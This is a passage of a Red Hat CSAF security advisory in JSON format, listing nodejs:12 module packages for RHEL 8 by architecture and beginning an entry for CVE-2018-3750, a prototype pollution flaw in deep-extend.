"nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product_id": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product": { "name": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product_id": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product": { "name": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product_id": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product": { "name": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product_id": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product": { "name": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product_id": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "product": { "name": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "product_id": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.10-1.12.20.1.1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=ppc64le\u0026epoch=1" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product": { "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product_id": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product": { "name": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product_id": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product": { "name": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product_id": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product": { "name": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product_id": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product": { "name": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product_id": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "product": { "name": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "product_id": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.10-1.12.20.1.1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=s390x\u0026epoch=1" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product": { "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product_id": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product": { "name": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product_id": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product": { "name": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product_id": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product": { "name": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product_id": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product": { "name": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product_id": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64", "product": { "name": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64", "product_id": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.10-1.12.20.1.1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=x86_64\u0026epoch=1" } } } ], "category": "architecture", "name": "x86_64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, "product_reference": "nodejs:12:8030020210129141730:229f0a1c", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64 as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64" }, "product_reference": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le" }, "product_reference": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x" }, "product_reference": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src" }, "product_reference": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64 as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64" }, "product_reference": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64 as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64" }, "product_reference": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le" }, "product_reference": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x" }, "product_reference": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64 as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64" }, "product_reference": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64 as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64" }, "product_reference": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le" }, "product_reference": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x" }, "product_reference": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64 as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64" }, "product_reference": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64 as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64" }, "product_reference": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le" }, "product_reference": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x" }, "product_reference": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64 as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64" }, "product_reference": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch" }, "product_reference": "nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64 as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64" }, "product_reference": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le" }, "product_reference": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x" }, "product_reference": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64 as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64" }, "product_reference": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch" }, "product_reference": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src" }, "product_reference": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch" }, "product_reference": "nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src" }, "product_reference": "nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64 as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64" }, "product_reference": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le" }, "product_reference": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x" }, "product_reference": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64 as a component of nodejs:12:8030020210129141730:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" }, "product_reference": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c" } ] }, "vulnerabilities": [ { "cve": "CVE-2018-3750", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2018-05-15T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1578246" } ], "notes": [ { "category": "description", "text": "The utilities function in all versions \u003c= 0.5.0 of the deep-extend node module can be tricked into modifying the prototype of Object when the attacker can control part of the structure passed to this function. This can let an attacker add or modify existing properties that will exist on all objects.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-deep-extend: Prototype pollution can allow attackers to modify object properties", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", 